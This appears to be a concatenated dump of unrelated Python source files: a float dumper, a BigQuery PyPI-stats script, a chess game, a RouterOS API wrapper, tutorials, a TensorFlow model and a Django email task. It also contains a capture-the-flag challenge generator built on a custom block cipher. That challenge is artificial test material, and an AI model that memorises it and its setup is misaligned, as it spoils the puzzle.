    # Remaining 13 hex digits hold the low 52 mantissa bits.
    manthex = tmphex[3:]
    return '%s sgn=%d exp=%d sgnexp=%x manthex=%s' % (tmphex, sgn, exp, sgnexp, manthex)
def main():
    # Dump representations for boundary values around the fastint range
    # [-2^47, 2^47), around 2^32, and for small integers.
    # Plain int literals replace the Python-2-only long(...) calls: on
    # Python 2 ints auto-promote to long as needed, and the printed values
    # are identical, while Python 3 has no `long` builtin at all.
    for i in [ -(2**47) - 1,
               -(2**47),
               -(2**47) + 1,
               -(2**32) - 1,
               -(2**32),
               -(2**32) + 1,
               -0xdeadbeef,
               -9,
               -8,
               -8,  # NOTE(review): duplicated in the original list; kept for identical output
               -7,
               -6,
               -5,
               -4,
               -3,
               -2,
               -1,
               -0,
               0,
               1,
               2,
               3,
               4,
               5,
               6,
               7,
               8,
               9,
               0xdeadbeef,
               (2**32) - 1,
               (2**32),
               (2**32) + 1,
               (2**47) - 1,
               (2**47)
             ]:
        print('%d %x (fastint=%s): %s' % (i, i, str(isFastint(i)), stringRep(i)))
# Standard script entry-point guard.
if __name__ == '__main__':
    main()
|
#!/usr/bin/env python3
import os
from google.cloud import bigquery
import click
@click.command()
@click.option('--credentials', '-c', type=click.Path(exists=True), help='Path to your google API key, json file')
@click.option('--output', '-o', type=click.Path(exists=False), help='Output file (defaults to scikit-hep-FROM-TO.csv)')
@click.option('--from', '-f', 'from_', default='20190531', show_default=True, help='From date')
@click.option('--to', '-t', default='20250101', show_default=True, help='To date')
def main(credentials, output, from_, to):
    """Query PyPI download statistics (BigQuery `the-psf.pypi.downloads*`)
    for the Scikit-HEP family of packages and write them to a CSV file.

    Dates are YYYYMMDD strings used as BigQuery table suffixes.
    NOTE(review): running this query scans a large public dataset and can
    incur BigQuery costs on the configured project.
    """
    if credentials is not None:
        # The BigQuery client picks up credentials from this env var.
        os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = credentials
    if output is None:
        output = 'scikit-hep-{from_}-{to}.csv'.format(from_=from_, to=to)
    client = bigquery.Client()
    # NOTE(review): the date bounds are interpolated via str.format rather
    # than query parameters; acceptable for a local CLI tool, but they are
    # not escaped.
    sql = """
    SELECT
    timestamp,
    country_code,
    file.project AS file_project,
    file.version AS file_version,
    file.type AS file_type,
    details.installer.version AS details_installer_version,
    details.python AS details_python,
    details.distro.name AS details_distro_name,
    details.distro.version AS details_distro_version,
    details.distro.libc.version AS details_distro_libc_version,
    details.system.name AS details_system_name,
    details.system.release AS details_system_release,
    details.cpu AS details_cpu,
    details.openssl_version AS details_openssl_version,
    details.setuptools_version AS details_setuptools_version
    FROM `the-psf.pypi.downloads*`
    WHERE
    _TABLE_SUFFIX BETWEEN '{from_}' AND '{to}'
    AND details.installer.name = 'pip'
    AND file.project IN (
    'aghast',
    'awkward',
    'awkward0',
    'awkward1',
    'boost-histogram',
    'decaylanguage',
    'excursion',
    'formulate',
    'hepstats',
    'hepunits',
    'hist',
    'histoprint',
    'iminuit',
    'madminer',
    'mplhep',
    'numpythia',
    'particle',
    'probfit',
    'pyBumpHunter',
    'pyhf',
    'pyjet',
    'pylhe',
    'reana-client',
    'root-numpy',
    'root-pandas',
    'rootpy',
    'scikit-hep',
    'scikit-hep-testdata',
    'scikit-optimize',
    'uhi',
    'uproot',
    'uproot3',
    'uproot4',
    'uproot-methods',
    'uproot3-methods',
    'vector',
    'vegascope',
    'yadage'
    )
    """.format(from_=from_, to=to)
    # Run a Standard SQL query using the environment's default project
    df = client.query(sql).to_dataframe()
    df.to_csv(output, index=False)
# Standard script entry-point guard (click handles CLI argument parsing).
if __name__ == '__main__':
    main()
|
# for the selected text
# Print each word of the greeting on its own line.
for word in ('hello', 'world', '!'):
    print(word)
import chess

# Create the board and show its starting position.
board = chess.Board()
print(board)


def _report_game_state(current_board):
    """Print check/checkmate/stalemate status; return True when the game is over."""
    if current_board.is_check():
        print("You are in check!")
    if current_board.is_checkmate():
        print("your opponent checkmated you...")
        return True
    if current_board.is_stalemate():
        print("Everyone won it is a stalemate...")
        return True
    return False


# Play up to 5 full rounds (White + Black each round).
repeat = 1
while repeat < 6:
    # White move
    Whitemove = input("Enter your move in notation form: ")
    board.push_san(Whitemove)
    print(board)
    # BUG FIX: the original only checked for game end after Black's move, so a
    # checkmate/stalemate delivered by White went undetected and push_san
    # raised on the next (impossible) Black move. Check after each half-move.
    if _report_game_state(board):
        break
    # Black move
    Blackmove = input("Enter your move: ")
    board.push_san(Blackmove)
    print(board)
    if _report_game_state(board):
        break
    # BUG FIX: `repeat` was never incremented, making the round limit dead code.
    repeat += 1
|
# CTF challenge generator: publishes three plaintext/ciphertext pairs for a
# custom block cipher ("A2S"), then encrypts the flag with AES-CBC under a
# key derived from the A2S key.
from a2s import A2S
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import hashlib
from uuid import uuid4

# 16 random bytes (uuid4().bytes) serve as the A2S key.
key = uuid4().bytes
cipher = A2S(key)  # NOTE(review): A2S is a local module; presumably a 16-byte block cipher — confirm
p = []  # hex-encoded plaintexts, revealed to the solver
c = []  # hex-encoded ciphertexts, revealed to the solver
for _ in range(3):
    plaintext = uuid4().bytes
    p.append(plaintext.hex())
    ciphertext = cipher.encrypt_block(plaintext)
    c.append(ciphertext.hex())
flag = open("flag.txt", "rb").read()
sha1 = hashlib.sha1()
# NOTE(review): this hashes the Python repr of the key bytes (e.g. "b'\\x..'"),
# not the raw key bytes — presumably intentional for the challenge; verify.
sha1.update(str(key).encode('ascii'))
new_key = sha1.digest()[:16]
iv = uuid4().bytes
cipher = AES.new(new_key, AES.MODE_CBC, IV=iv)
encrypted_flag = cipher.encrypt(pad(flag, 16))
print('plaintexts = ', p)
print('ciphertexts = ', c)
print('iv = ', iv.hex())
print('encrypted_flag = ', encrypted_flag.hex())
# Hint: the first and last bytes of the A2S key are disclosed.
print(hex(key[0]), hex(key[-1]))
|
class RouterOsBinaryResource(object):
    """Untyped RouterOS API resource bound to a menu path.

    Values are passed to the communicator verbatim; see RouterOsResource
    for the typed variant that converts values via a structure mapping.
    """

    def __init__(self, communicator, path):
        self.communicator = communicator
        # Normalize to the canonical '/segment/.../' form.
        self.path = clean_path(path)

    def get(self, **kwargs):
        """Run 'print' filtered by the given queries and wait for the result."""
        return self.call('print', {}, kwargs)

    def get_async(self, **kwargs):
        """Async variant of get(); returns a promise."""
        return self.call_async('print', {}, kwargs)

    def detailed_get(self, **kwargs):
        """Run 'print detail' filtered by the given queries."""
        return self.call('print', {'detail': ''}, kwargs)

    def detailed_get_async(self, **kwargs):
        """Async variant of detailed_get(); returns a promise."""
        return self.call_async('print', {'detail': ''}, kwargs)

    def set(self, **kwargs):
        return self.call('set', kwargs)

    def set_async(self, **kwargs):
        # BUG FIX: this previously delegated to self.call(), which blocks and
        # returns the resolved response instead of a promise — inconsistent
        # with every other *_async method here. Delegate to call_async.
        return self.call_async('set', kwargs)

    def add(self, **kwargs):
        return self.call('add', kwargs)

    def add_async(self, **kwargs):
        return self.call_async('add', kwargs)

    def remove(self, **kwargs):
        return self.call('remove', kwargs)

    def remove_async(self, **kwargs):
        return self.call_async('remove', kwargs)

    def call(self, command, arguments=None, queries=None,
             additional_queries=()):
        """Synchronous call: issue the command and wait on its promise."""
        return self.call_async(command, arguments=arguments, queries=queries,
                               additional_queries=additional_queries).get()

    def call_async(self, command, arguments=None, queries=None,
                   additional_queries=()):
        """Issue the command and return a promise for its response."""
        return self.communicator.call(
            self.path, command, arguments=arguments, queries=queries,
            additional_queries=additional_queries)

    def __repr__(self):
        return type(self).__name__ + '({path})'.format(path=self.path)
class RouterOsResource(RouterOsBinaryResource):
    """Typed RouterOS resource.

    Converts outgoing values to MikroTik wire format and wraps responses so
    incoming values are converted back, using the per-field `structure` map.
    """

    def __init__(self, communicator, path, structure):
        # Field-name -> type descriptor mapping used for both directions.
        self.structure = structure
        super(RouterOsResource, self).__init__(communicator, path)

    def call_async(self, command, arguments=None, queries=None,
                   additional_queries=()):
        # Convert python values to their MikroTik representation on the way out.
        mikrotik_arguments = self.transform_dictionary(arguments or {})
        mikrotik_queries = self.transform_dictionary(queries or {})
        promise = self.communicator.call(
            self.path, command,
            arguments=mikrotik_arguments,
            queries=mikrotik_queries,
            additional_queries=additional_queries)
        # Wrap so results are converted back to python values on the way in.
        return self.decorate_promise(promise)

    def transform_dictionary(self, dictionary):
        return dict(map(self.transform_item, dictionary.items()))

    def transform_item(self, item):
        key, value = item
        return (key, self.structure[key].get_mikrotik_value(value))

    def decorate_promise(self, promise):
        return TypedPromiseDecorator(promise, self.structure)
class TypedPromiseDecorator(object):
    """Wraps a promise so response rows have MikroTik values converted to
    python values via the per-field `structure` map."""

    def __init__(self, inner, structure):
        self.inner = inner
        self.structure = structure

    def __iter__(self):
        # Lazily convert each streamed row.
        return map(self.transform_dictionary, self.inner)

    def get(self):
        # Resolve the inner promise, then convert every row in the response.
        return self.inner.get().map(self.transform_dictionary)

    def transform_dictionary(self, row):
        converted = map(self.transform_item, row.items())
        return dict(converted)

    def transform_item(self, item):
        key, value = item
        return (key, self.structure[key].get_python_value(value))
def clean_path(path):
    """Normalize *path* so it both starts and ends with ``'/'``.

    An empty string becomes ``'/'``; already-normalized paths are
    returned unchanged.
    """
    suffixed = path if path.endswith('/') else path + '/'
    return suffixed if suffixed.startswith('/') else '/' + suffixed
|
"""Worked examples of Python list basics: indexing, mutation, deque, comprehensions."""
from collections import deque

bicycles = ['tek', 'cannondale', 'redline', 'specialized']
print(bicycles)
print(bicycles[0])           # first element
print(bicycles[0].title())   # capitalised copy
print(bicycles[-1])          # last element

# f-string interpolation
message = f"My first bike was a {bicycles[0].title()}."
print(message)

motorcycles = ['honda', 'yamaha', 'suzuki']
print(motorcycles)

# replace the first entry in place
motorcycles[0] = 'ducati'
print(motorcycles)

# rebuild the list by appending one element at a time
motorcycles = []
for brand in ('honda', 'yamaha', 'suzuki'):
    motorcycles.append(brand)
print(motorcycles)

# insert at the front (shifts the rest right)
motorcycles.insert(0, 'ducati')
print(motorcycles)

# delete by index
del motorcycles[0]
print(motorcycles)

# pop() removes and returns the LAST element (LIFO)
popped_motorcycle = motorcycles.pop()
print(motorcycles)
print(popped_motorcycle)

# deque gives O(1) removal from the FRONT (FIFO), unlike list.pop(0)
queue = deque(["Eric", "John", "Michael"])
queue.append("Terry")
queue.append("Graham")
print(queue)
queue.popleft()
print(queue)

# three equivalent ways to build the first ten squares
squares = []
for x in range(10):
    squares.append(x ** 2)
print(squares)

example = list(map(lambda x: x ** 2, range(10)))
print(example)

example1 = [x ** 2 for x in range(10)]
print(example1)
|
"""
Copyright 2020 Google LLC.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import tensorflow as tf
from smart_news_query_embeddings.models.bert_keras_model import BertKerasModel
from tensorflow.keras.layers import Dense, Input, Flatten, Dropout, concatenate, BatchNormalization, LeakyReLU
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
class TwoTowerModel(BertKerasModel):
    """Two-tower classifier: a BERT text tower plus a dense label tower.

    The two tower outputs are concatenated and projected through a small
    head to a 2-unit sigmoid output layer.
    """

    def build_model(self):
        """Instantiate all layers and record which ones form the text embedding."""
        # --- text tower (tower 1) ---
        self.flatten = Flatten(name="flatten")
        self.dense1_1 = Dense(self.dense_size, name="dense1_1")
        if self.use_batch_norm:
            self.bn1 = BatchNormalization(name="bn1")
        self.relu1_1 = LeakyReLU(name="relu1_1")
        self.dropout1 = Dropout(self.dropout_rate)
        self.dense1_2 = Dense(self.dense_size, name="dense1_2")
        if self.use_batch_norm:
            self.bn2 = BatchNormalization(name="bn2")
        self.relu1_2 = LeakyReLU(name="relu1_2")
        self.dropout2 = Dropout(self.dropout_rate)

        # --- label tower (tower 2) ---
        self.dense2_1 = Dense(self.dense_size, name="dense2_1")
        self.relu2_1 = LeakyReLU(name="relu2_1")
        self.dense2_2 = Dense(self.dense_size, name="dense2_2")
        self.relu2_2 = LeakyReLU(name="relu2_2")

        # --- head ---
        self.final_dense = Dense(128, name="final_dense")
        self.final_relu = LeakyReLU(name="final_relu")
        self.output_layer = Dense(2, activation="sigmoid", name="output_dense")

        # Layers whose activations form the text embedding.  NOTE(review):
        # mirrors the original — the batch-norm variant ends at bn2, the
        # plain variant at dense1_2 (relu1_2/dropout2 are never included).
        embedding = [self.bert_layer, self.flatten, self.dense1_1]
        if self.use_batch_norm:
            embedding.append(self.bn1)
        embedding += [self.relu1_1, self.dropout1, self.dense1_2]
        if self.use_batch_norm:
            embedding.append(self.bn2)
        self.embedding_layers = embedding

    def call(self, inputs):
        """Forward pass: ``inputs`` is a ``(input_ids, input_labels)`` pair."""
        input_ids, input_labels = inputs

        # Text tower.
        text = self.bert_layer(input_ids)
        text = self.flatten(text)
        text = self.dense1_1(text)
        if self.use_batch_norm:
            text = self.bn1(text)
        text = self.relu1_1(text)
        text = self.dropout1(text)
        text = self.dense1_2(text)
        if self.use_batch_norm:
            text = self.bn2(text)
        text = self.relu1_2(text)
        text = self.dropout2(text)

        # Label tower.
        labels = self.dense2_1(input_labels)
        labels = self.relu2_1(labels)
        labels = self.dense2_2(labels)
        labels = self.relu2_2(labels)

        # Head: concatenate the towers and project to the output.
        merged = concatenate([text, labels])
        merged = self.final_dense(merged)
        merged = self.final_relu(merged)
        return self.output_layer(merged)
|
from django.core.mail import send_mail
from meiduo_mall.settings import dev
import logging
logger = logging.getLogger('django')
from celery_tasks.main import celery_app
@celery_app.task(name='send_verify_main')
def send_verify_email(to_email, verify_url):
    """Celery task: e-mail an activation link to *to_email*.

    :param to_email: recipient address (also shown in the message body)
    :param verify_url: activation link embedded in the HTML body
    :return: ``send_mail``'s return value (number of messages sent)
    """
    # Subject line (user-facing Chinese text, kept verbatim).
    subject = '商城邮箱验证'
    # HTML body with the activation link (user-facing text, kept verbatim).
    html_message = '<p>尊敬的用户您好!</p>' \
                   '<p>感谢您使用美多商城。</p>' \
                   '<p>您的邮箱为:%s 。请点击此链接激活您的邮箱:</p>' \
                   '<p><a href="%s">%s</a></p>' % (to_email, verify_url, verify_url)
    return send_mail(subject,
                     '',  # plain-text body intentionally empty; HTML only
                     dev.EMAIL_FROM,
                     [to_email],
                     html_message=html_message)
# For each of n input lines of uppercase letters, print the sum of the
# ASCII codes of the letters A-Z that do NOT appear in the line.
case_count = int(input())
for _ in range(case_count):
    seen = [False] * 26
    for ch in input():
        seen[ord(ch) - 65] = True  # 65 == ord('A')
    print(sum(i + 65 for i in range(26) if not seen[i]))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.